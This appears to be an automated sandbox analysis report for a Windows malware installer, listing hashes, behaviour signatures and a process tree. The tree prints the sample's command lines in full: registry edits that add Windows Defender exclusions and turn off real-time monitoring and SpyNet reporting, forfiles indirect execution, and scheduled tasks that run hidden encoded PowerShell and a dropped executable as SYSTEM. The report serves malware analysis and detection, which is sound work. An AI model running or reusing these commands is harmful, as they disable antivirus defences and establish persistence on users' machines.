Resubmissions

15-11-2024 18:05

241115-wpjcdsxrdy 10

11-11-2024 21:40

241111-1h6xbsxcql 10

03-12-2022 17:54

221203-wg4ncscc33 10

Analysis

  • max time kernel
    149s
  • max time network
    157s
  • platform
    windows7_x64
  • resource
    win7-20241010-en
  • resource tags

    arch:x64, arch:x86, image:win7-20241010-en, locale:en-us, os:windows7-x64, system
  • submitted
    11-11-2024 21:40

General

  • Target

    9d8729b9ca0547bf3679e88b9c2c5ae941fcfe67dfd7dfc598cb304d6624ddde.exe

  • Size

    6.3MB

  • MD5

    ded964e022a37d93d434091ec75f9881

  • SHA1

    e89a551ac1f19dc3838e21157667e2f98d84d06b

  • SHA256

    9d8729b9ca0547bf3679e88b9c2c5ae941fcfe67dfd7dfc598cb304d6624ddde

  • SHA512

    13f0873cc797eeb7a4a1606ea3dc95f0d1f96bf1dfad286ee3959f0b885426214c24c1ea2422a46191f78063b75200d7ad9065d5654a7758086a9e41f7cf75af

  • SSDEEP

    196608:91OEVXHF+E/eq7QuIUVUMxVuAK1X84eu/k9RD13q:3OEVV+tq7Q7U62AAi84VkF13q

Malware Config

Signatures

  • Modifies Windows Defender Real-time Protection settings 3 TTPs 4 IoCs
  • Windows security bypass 2 TTPs 36 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Runs PowerShell with the display window hidden.

  • Checks BIOS information in registry 2 TTPs 1 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Executes dropped EXE 3 IoCs
  • Indirect Command Execution 1 TTPs 2 IoCs

    Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters.

  • Loads dropped DLL 4 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops Chrome extension 1 IoCs
  • Drops file in System32 directory 18 IoCs
  • Drops file in Program Files directory 13 IoCs
  • Drops file in Windows directory 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • Enumerates system info in registry 2 TTPs 2 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 13 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 22 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\9d8729b9ca0547bf3679e88b9c2c5ae941fcfe67dfd7dfc598cb304d6624ddde.exe
    "C:\Users\Admin\AppData\Local\Temp\9d8729b9ca0547bf3679e88b9c2c5ae941fcfe67dfd7dfc598cb304d6624ddde.exe"
    1⤵
    • Loads dropped DLL
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:2268
    • C:\Users\Admin\AppData\Local\Temp\7zS9B46.tmp\Install.exe
      .\Install.exe /S /site_id "525403"
      2⤵
      • Checks BIOS information in registry
      • Executes dropped EXE
      • Loads dropped DLL
      • Drops file in System32 directory
      • System Location Discovery: System Language Discovery
      • Enumerates system info in registry
      • Suspicious use of WriteProcessMemory
      PID:2288
      • C:\Windows\SysWOW64\forfiles.exe
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
        3⤵
        • Indirect Command Execution
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:3044
        • C:\Windows\SysWOW64\cmd.exe
          /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:2296
          • \??\c:\windows\SysWOW64\reg.exe
            REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
            5⤵
            • System Location Discovery: System Language Discovery
            PID:2900
          • \??\c:\windows\SysWOW64\reg.exe
            REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
            5⤵
              PID:2828
        • C:\Windows\SysWOW64\forfiles.exe
          "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
          3⤵
          • Indirect Command Execution
          • Suspicious use of WriteProcessMemory
          PID:1744
          • C:\Windows\SysWOW64\cmd.exe
            /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
            4⤵
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:2808
            • \??\c:\windows\SysWOW64\reg.exe
              REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
              5⤵
              • System Location Discovery: System Language Discovery
              PID:2932
            • \??\c:\windows\SysWOW64\reg.exe
              REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
              5⤵
              • System Location Discovery: System Language Discovery
              PID:2228
        • C:\Windows\SysWOW64\schtasks.exe
          schtasks /CREATE /TN "gBaUAFyGj" /SC once /ST 17:51:34 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
          3⤵
          • System Location Discovery: System Language Discovery
          • Scheduled Task/Job: Scheduled Task
          PID:2824
        • C:\Windows\SysWOW64\schtasks.exe
          schtasks /run /I /tn "gBaUAFyGj"
          3⤵
          • System Location Discovery: System Language Discovery
          PID:2364
        • C:\Windows\SysWOW64\schtasks.exe
          schtasks /DELETE /F /TN "gBaUAFyGj"
          3⤵
          • System Location Discovery: System Language Discovery
          PID:2128
        • C:\Windows\SysWOW64\schtasks.exe
          schtasks /CREATE /TN "bKwcWZekAnYWEgmozo" /SC once /ST 21:43:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\EMPJhNxQCousXoKTu\mXQpfNlKnkevdXC\FjXcTia.exe\" q8 /site_id 525403 /S" /V1 /F
          3⤵
          • Drops file in Windows directory
          • Scheduled Task/Job: Scheduled Task
          PID:2640
    • C:\Windows\system32\taskeng.exe
      taskeng.exe {41965AA1-83FD-4B86-B789-F93F26497EC6} S-1-5-21-3692679935-4019334568-335155002-1000:BCXRJFKE\Admin:Interactive:[1]
      1⤵
        PID:1892
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
          C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
          2⤵
          • Command and Scripting Interpreter: PowerShell
          • Drops file in System32 directory
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2752
          • C:\Windows\system32\gpupdate.exe
            "C:\Windows\system32\gpupdate.exe" /force
            3⤵
              PID:1472
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
            C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
            2⤵
            • Command and Scripting Interpreter: PowerShell
            • Drops file in System32 directory
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:676
            • C:\Windows\system32\gpupdate.exe
              "C:\Windows\system32\gpupdate.exe" /force
              3⤵
                PID:2440
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
              C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
              2⤵
              • Command and Scripting Interpreter: PowerShell
              • Drops file in System32 directory
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:2528
              • C:\Windows\system32\gpupdate.exe
                "C:\Windows\system32\gpupdate.exe" /force
                3⤵
                  PID:1728
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                2⤵
                • Command and Scripting Interpreter: PowerShell
                • Drops file in System32 directory
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:1600
                • C:\Windows\system32\gpupdate.exe
                  "C:\Windows\system32\gpupdate.exe" /force
                  3⤵
                    PID:2912
              • C:\Windows\system32\gpscript.exe
                gpscript.exe /RefreshSystemParam
                1⤵
                  PID:2316
                • C:\Windows\system32\taskeng.exe
                  taskeng.exe {70247DA3-6C39-4EBC-855B-0EFB3E8019D6} S-1-5-18:NT AUTHORITY\System:Service:
                  1⤵
                    PID:2320
                    • C:\Users\Admin\AppData\Local\Temp\EMPJhNxQCousXoKTu\mXQpfNlKnkevdXC\FjXcTia.exe
                      C:\Users\Admin\AppData\Local\Temp\EMPJhNxQCousXoKTu\mXQpfNlKnkevdXC\FjXcTia.exe q8 /site_id 525403 /S
                      2⤵
                      • Executes dropped EXE
                      • Drops file in System32 directory
                      • System Location Discovery: System Language Discovery
                      PID:1984
                      • C:\Windows\SysWOW64\schtasks.exe
                        schtasks /CREATE /TN "gejFPWVdX" /SC once /ST 10:36:44 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                        3⤵
                        • System Location Discovery: System Language Discovery
                        • Scheduled Task/Job: Scheduled Task
                        PID:1884
                      • C:\Windows\SysWOW64\schtasks.exe
                        schtasks /run /I /tn "gejFPWVdX"
                        3⤵
                        • System Location Discovery: System Language Discovery
                        PID:1840
                      • C:\Windows\SysWOW64\schtasks.exe
                        schtasks /DELETE /F /TN "gejFPWVdX"
                        3⤵
                        • System Location Discovery: System Language Discovery
                        PID:1656
                      • C:\Windows\SysWOW64\cmd.exe
                        cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
                        3⤵
                          PID:1064
                          • C:\Windows\SysWOW64\reg.exe
                            REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
                            4⤵
                            • Modifies Windows Defender Real-time Protection settings
                            PID:1304
                        • C:\Windows\SysWOW64\cmd.exe
                          cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
                          3⤵
                          • System Location Discovery: System Language Discovery
                          PID:2124
                          • C:\Windows\SysWOW64\reg.exe
                            REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
                            4⤵
                            • Modifies Windows Defender Real-time Protection settings
                            • System Location Discovery: System Language Discovery
                            PID:2992
                        • C:\Windows\SysWOW64\schtasks.exe
                          schtasks /CREATE /TN "gkCmkKzew" /SC once /ST 12:14:13 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                          3⤵
                          • System Location Discovery: System Language Discovery
                          • Scheduled Task/Job: Scheduled Task
                          PID:1468
                        • C:\Windows\SysWOW64\schtasks.exe
                          schtasks /run /I /tn "gkCmkKzew"
                          3⤵
                          • System Location Discovery: System Language Discovery
                          PID:1932
                        • C:\Windows\SysWOW64\schtasks.exe
                          schtasks /DELETE /F /TN "gkCmkKzew"
                          3⤵
                          • System Location Discovery: System Language Discovery
                          PID:2880
                        • C:\Windows\SysWOW64\cmd.exe
                          cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\YSrBLfWUtIHnuviW" /t REG_DWORD /d 0 /reg:32
                          3⤵
                            PID:2252
                            • C:\Windows\SysWOW64\reg.exe
                              REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\YSrBLfWUtIHnuviW" /t REG_DWORD /d 0 /reg:32
                              4⤵
                              • Windows security bypass
                              • System Location Discovery: System Language Discovery
                              PID:3048
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\YSrBLfWUtIHnuviW" /t REG_DWORD /d 0 /reg:64
                            3⤵
                              PID:2800
                              • C:\Windows\SysWOW64\reg.exe
                                REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\YSrBLfWUtIHnuviW" /t REG_DWORD /d 0 /reg:64
                                4⤵
                                • Windows security bypass
                                • System Location Discovery: System Language Discovery
                                PID:2840
                            • C:\Windows\SysWOW64\cmd.exe
                              cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\YSrBLfWUtIHnuviW" /t REG_DWORD /d 0 /reg:32
                              3⤵
                                PID:2824
                                • C:\Windows\SysWOW64\reg.exe
                                  REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\YSrBLfWUtIHnuviW" /t REG_DWORD /d 0 /reg:32
                                  4⤵
                                  • System Location Discovery: System Language Discovery
                                  PID:804
                              • C:\Windows\SysWOW64\cmd.exe
                                cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\YSrBLfWUtIHnuviW" /t REG_DWORD /d 0 /reg:64
                                3⤵
                                • System Location Discovery: System Language Discovery
                                PID:2364
                                • C:\Windows\SysWOW64\reg.exe
                                  REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\YSrBLfWUtIHnuviW" /t REG_DWORD /d 0 /reg:64
                                  4⤵
                                  • System Location Discovery: System Language Discovery
                                  PID:1276
                              • C:\Windows\SysWOW64\cmd.exe
                                cmd /C copy nul "C:\Windows\Temp\YSrBLfWUtIHnuviW\oafJjutu\uCLzMqtKLlfsPnpP.wsf"
                                3⤵
                                • System Location Discovery: System Language Discovery
                                PID:2376
                              • C:\Windows\SysWOW64\wscript.exe
                                wscript "C:\Windows\Temp\YSrBLfWUtIHnuviW\oafJjutu\uCLzMqtKLlfsPnpP.wsf"
                                3⤵
                                • Modifies data under HKEY_USERS
                                PID:320
                                • C:\Windows\SysWOW64\reg.exe
                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RqtPwFqMTiUn" /t REG_DWORD /d 0 /reg:32
                                  4⤵
                                  • Windows security bypass
                                  • System Location Discovery: System Language Discovery
                                  PID:2752
                                • C:\Windows\SysWOW64\reg.exe
                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RqtPwFqMTiUn" /t REG_DWORD /d 0 /reg:64
                                  4⤵
                                  • Windows security bypass
                                  PID:2280
                                • C:\Windows\SysWOW64\reg.exe
                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\UBqYudvSNocU2" /t REG_DWORD /d 0 /reg:32
                                  4⤵
                                  • Windows security bypass
                                  • System Location Discovery: System Language Discovery
                                  PID:2580
                                • C:\Windows\SysWOW64\reg.exe
                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\UBqYudvSNocU2" /t REG_DWORD /d 0 /reg:64
                                  4⤵
                                  • Windows security bypass
                                  • System Location Discovery: System Language Discovery
                                  PID:1596
                                • C:\Windows\SysWOW64\reg.exe
                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZUXSmeDRU" /t REG_DWORD /d 0 /reg:32
                                  4⤵
                                  • Windows security bypass
                                  • System Location Discovery: System Language Discovery
                                  PID:2560
                                • C:\Windows\SysWOW64\reg.exe
                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZUXSmeDRU" /t REG_DWORD /d 0 /reg:64
                                  4⤵
                                  • Windows security bypass
                                  • System Location Discovery: System Language Discovery
                                  PID:2416
                                • C:\Windows\SysWOW64\reg.exe
                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oXjeNNLqKAotC" /t REG_DWORD /d 0 /reg:32
                                  4⤵
                                  • Windows security bypass
                                  PID:2056
                                • C:\Windows\SysWOW64\reg.exe
                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oXjeNNLqKAotC" /t REG_DWORD /d 0 /reg:64
                                  4⤵
                                  • Windows security bypass
                                  PID:1168
                                • C:\Windows\SysWOW64\reg.exe
                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\xonCRuklPFipnPeqKpR" /t REG_DWORD /d 0 /reg:32
                                  4⤵
                                  • Windows security bypass
                                  • System Location Discovery: System Language Discovery
                                  PID:2640
                                • C:\Windows\SysWOW64\reg.exe
                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\xonCRuklPFipnPeqKpR" /t REG_DWORD /d 0 /reg:64
                                  4⤵
                                  • Windows security bypass
                                  PID:940
                                • C:\Windows\SysWOW64\reg.exe
                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\hrOORTLiECQfZJVB" /t REG_DWORD /d 0 /reg:32
                                  4⤵
                                  • Windows security bypass
                                  • System Location Discovery: System Language Discovery
                                  PID:2088
                                • C:\Windows\SysWOW64\reg.exe
                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\hrOORTLiECQfZJVB" /t REG_DWORD /d 0 /reg:64
                                  4⤵
                                  • Windows security bypass
                                  • System Location Discovery: System Language Discovery
                                  PID:1000
                                • C:\Windows\SysWOW64\reg.exe
                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\EMPJhNxQCousXoKTu" /t REG_DWORD /d 0 /reg:32
                                  4⤵
                                  • Windows security bypass
                                  PID:1076
                                • C:\Windows\SysWOW64\reg.exe
                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\EMPJhNxQCousXoKTu" /t REG_DWORD /d 0 /reg:64
                                  4⤵
                                  • Windows security bypass
                                  PID:2132
                                • C:\Windows\SysWOW64\reg.exe
                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\YSrBLfWUtIHnuviW" /t REG_DWORD /d 0 /reg:32
                                  4⤵
                                  • Windows security bypass
                                  • System Location Discovery: System Language Discovery
                                  PID:2592
                                • C:\Windows\SysWOW64\reg.exe
                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\YSrBLfWUtIHnuviW" /t REG_DWORD /d 0 /reg:64
                                  4⤵
                                  • Windows security bypass
                                  • System Location Discovery: System Language Discovery
                                  PID:2204
                                • C:\Windows\SysWOW64\reg.exe
                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RqtPwFqMTiUn" /t REG_DWORD /d 0 /reg:32
                                  4⤵
                                    PID:1724
                                  • C:\Windows\SysWOW64\reg.exe
                                    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RqtPwFqMTiUn" /t REG_DWORD /d 0 /reg:64
                                    4⤵
                                    • System Location Discovery: System Language Discovery
                                    PID:2308
                                  • C:\Windows\SysWOW64\reg.exe
                                    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\UBqYudvSNocU2" /t REG_DWORD /d 0 /reg:32
                                    4⤵
                                    • System Location Discovery: System Language Discovery
                                    PID:956
                                  • C:\Windows\SysWOW64\reg.exe
                                    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\UBqYudvSNocU2" /t REG_DWORD /d 0 /reg:64
                                    4⤵
                                    • System Location Discovery: System Language Discovery
                                    PID:2820
                                  • C:\Windows\SysWOW64\reg.exe
                                    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZUXSmeDRU" /t REG_DWORD /d 0 /reg:32
                                    4⤵
                                      PID:2568
                                    • C:\Windows\SysWOW64\reg.exe
                                      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZUXSmeDRU" /t REG_DWORD /d 0 /reg:64
                                      4⤵
                                      • System Location Discovery: System Language Discovery
                                      PID:2324
                                    • C:\Windows\SysWOW64\reg.exe
                                      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oXjeNNLqKAotC" /t REG_DWORD /d 0 /reg:32
                                      4⤵
                                      • System Location Discovery: System Language Discovery
                                      PID:1524
                                    • C:\Windows\SysWOW64\reg.exe
                                      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oXjeNNLqKAotC" /t REG_DWORD /d 0 /reg:64
                                      4⤵
                                      • System Location Discovery: System Language Discovery
                                      PID:2676
                                    • C:\Windows\SysWOW64\reg.exe
                                      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\xonCRuklPFipnPeqKpR" /t REG_DWORD /d 0 /reg:32
                                      4⤵
        • System Location Discovery: System Language Discovery
        PID:868
      • C:\Windows\SysWOW64\reg.exe
        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\xonCRuklPFipnPeqKpR" /t REG_DWORD /d 0 /reg:64
        4⤵
        • System Location Discovery: System Language Discovery
        PID:2052
      • C:\Windows\SysWOW64\reg.exe
        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\hrOORTLiECQfZJVB" /t REG_DWORD /d 0 /reg:32
        4⤵
        • System Location Discovery: System Language Discovery
        PID:2440
      • C:\Windows\SysWOW64\reg.exe
        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\hrOORTLiECQfZJVB" /t REG_DWORD /d 0 /reg:64
        4⤵
        • System Location Discovery: System Language Discovery
        PID:2180
      • C:\Windows\SysWOW64\reg.exe
        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\EMPJhNxQCousXoKTu" /t REG_DWORD /d 0 /reg:32
        4⤵
        • System Location Discovery: System Language Discovery
        PID:1568
      • C:\Windows\SysWOW64\reg.exe
        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\EMPJhNxQCousXoKTu" /t REG_DWORD /d 0 /reg:64
        4⤵
        • System Location Discovery: System Language Discovery
        PID:1304
      • C:\Windows\SysWOW64\reg.exe
        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\YSrBLfWUtIHnuviW" /t REG_DWORD /d 0 /reg:32
        4⤵
        PID:2060
      • C:\Windows\SysWOW64\reg.exe
        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\YSrBLfWUtIHnuviW" /t REG_DWORD /d 0 /reg:64
        4⤵
        • System Location Discovery: System Language Discovery
        PID:2744
    • C:\Windows\SysWOW64\schtasks.exe
      schtasks /CREATE /TN "gKnvhIPVZ" /SC once /ST 14:30:18 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
      3⤵
      • System Location Discovery: System Language Discovery
      • Scheduled Task/Job: Scheduled Task
      PID:1836
    • C:\Windows\SysWOW64\schtasks.exe
      schtasks /run /I /tn "gKnvhIPVZ"
      3⤵
      • System Location Discovery: System Language Discovery
      PID:2272
    • C:\Windows\SysWOW64\schtasks.exe
      schtasks /DELETE /F /TN "gKnvhIPVZ"
      3⤵
      • System Location Discovery: System Language Discovery
      PID:2880
    • C:\Windows\SysWOW64\cmd.exe
      cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:32
      3⤵
      • System Location Discovery: System Language Discovery
      PID:2252
      • C:\Windows\SysWOW64\reg.exe
